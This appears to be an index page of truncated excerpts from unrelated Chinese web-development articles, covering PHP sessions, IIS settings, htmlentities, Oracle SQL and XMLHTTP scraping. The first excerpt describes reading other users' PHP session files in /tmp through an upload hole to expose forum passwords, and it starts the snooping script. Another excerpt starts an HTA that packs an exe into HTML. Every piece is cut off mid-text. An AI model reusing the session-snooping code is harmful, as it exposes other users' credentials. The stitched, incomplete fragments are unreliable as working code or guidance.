如：name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"，也知道该session存放的位置，而且可以上传文件，所以嘛，当时就做了一次小小的黑客，在线的朋友的密码可以一览无余，呵呵：<?functionsubmit1(){global$username;print"<title>论坛监听器</title>";$i=0;if($username=="tasm"||$username=="Tasm"){print"你也太黑了吧？连我你也查？";return;}$path="/tmp/";$d=dir($path);while(...

我们有一个页面显示这个数组的信息，不停的刷新页面这个数组显示的内容在不停的变化，顺序、个数（有时候能显示全部的对象，有时却少几个），真是让人很恼火，你要丢就丢吧，老子最起码知道你会丢失，但你不丢失老自己变可有点儿不厚道啦。。。网上查了查，终于找出来原因，原来是程序池的设置作怪，有个叫“Web园”的东西不知道被那位同事改过，这一项数值的变化会引起Session值不稳定，具体设置是“打开IIS－－打开“应用程序池”中具体项的属性页中的“性能”选项卡，如图：下方的“web园”项中的值保证值为“1”，如果不是1,就会出现例用这个程序池的程序Session不稳定的情况发生。百度了一下儿“web园”,解释...

<html><head><title>获取ACCESS数据库表名_www.jb51.net</title></head><bodystyle="text-align:left;margin-left:50px;font-family:'arial';font-size:12px"><formstyle="padding:5px;margin:5px;margin-left:0px"name="get"action=""method="post">数据库路径:<inputtype="text"name="p...

这两个函数在格式化带有英文字符的html代码的时候基本没啥问题，但是htmlentities对中文字符也不放过，这样得出来的结果是中文字符部分变为一堆乱码。当时做英文站的时候根本就没觉察到这个问题，而今天公司的一个收藏站却因为有有非英文字符而出现了问题，我最终查出来是htmlentities这个函数的问题，同时我也找到了htmlspecialchars这个函数。对于这两个函数，php手册上都是英文做的解释，其中在htmlentities函数的说明部分有这么一段英文：Thisfunctionisidenticaltohtmlspecialchars()inallways,exceptwithht...

blankyao说“学习的过程就是不断的发现错误，不断的改正错误”；先看下手册上怎么说的吧！对一般人来说看下前两段就可以了MagicQuotes代码:MagicQuotesisaprocessthatautomagicallyescapesincomingdatatothePHPscript.It'spreferredtocodewithmagicquotesoffandtoinsteadescapethedataatruntime,asneeded.WhatareMagicQuotes代码:Whenon,all'(single-quote),"(doublequote),\(backslas...

由于NP写的不知什么原因，在我机器上执行后生成的exe，进程不会自动退出，我重新更新一下。用下面这个hta文件来转exe变成16进制的html保存了。这样也会方便一点。＝＝＝＝＝＝＝<!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01Transitional//EN"><html><head><title>packagefilev0.1</title><metahttp-equiv="Content-Type"content="text/html;charset=GB2312"><HTA:A...

selectcasewhenstatus='UNUSABLE'then'alterindex'||owner||'.'||index_name||'rebuildonlinecomputestatistics;'whento_number(degree)>1then'alterindex/*'||degree||'*/'||owner||'.'||index_name||'noparallel;'endcasefrom(select*fromdba_indexeswheredegree<>‘DEFAULT’)awherestatus=’UNUSABLE’orto_number...

又有人说设session.timeout=99999。这种同样不行，session有最大时间限制。我经过测试发现最大值为24小时，也就是说你最大可以session.timeout=1440，1441都是不可以有，呵呵。本人测试环境：win2003+IIS6.0+ASP3.0。所以想通过设session.timeout的过期时间让session永不过期是不可能的。写到Cookies里是比较好的方法，网上也有很多这样的教程，这里就不再说了！还有就是用在要保持session的页里设隐藏iframe每隔一段时间（这个时间小于session.timeout的时间）把刷新一次frame里的空页面！实现方法...

前几天有一个朋友在MSN上问我“ASP.NET从最初的接收到Httprequest到最终生成Response的整个流程到底是怎样的？”我觉得这个问题涉及到IIS和ASP.NETASP.NETRuntime的处理模型的问题，并不是三言两语就能说清楚的，所以决定写这样一篇介绍IIS和ASP.NETRuntimeProcessModel的文章，谈谈我对此的一个粗浅的认识，如果有什么不对的地方，希望大家及时指正。这篇文章大体分为两个部分，第一部分我将谈谈IIS的两个不同的版本—IIS5.x和IIS6（虽然IIS7已经Release很长时间了，而且较之前两个版本发生了非常大的变化，由于本人缺乏对IIS7...

 由于 Session 是以文本文件形式存储在服务器端的，所以不怕客户端修改 Session 内容。实际上在服务器端的 Session 文件，PHP 自动修改 Session 文件的权限，只保留了系统读和写权限，而且不能通过 ftp 修改，所以安全得多。对于 Cookie 来说，假设我们要验证用户是否登陆，就必须在 Cookie 中保存用户名和密码（可能是 md5 加密后字符串），并在每次请求页面的时候进行验证。如果...

确实，如果在原网站如果存在表单提交或cookies的验证，对于ASP来说，不使用基于SOCKET的组件就难以完成，其实，XMLHTTP的另外两个方法被我们忽略了，而这正是问题的关键。下面首先来说说这个方法 1。.send()        由于流行的小偷是使用的GET而不是POST来传送数据，所以很多人忽略了这个方法，而使用SEND发送数据也很简单，就是SEND("内容")，可是，        发送表单就不是这么简单，因为你...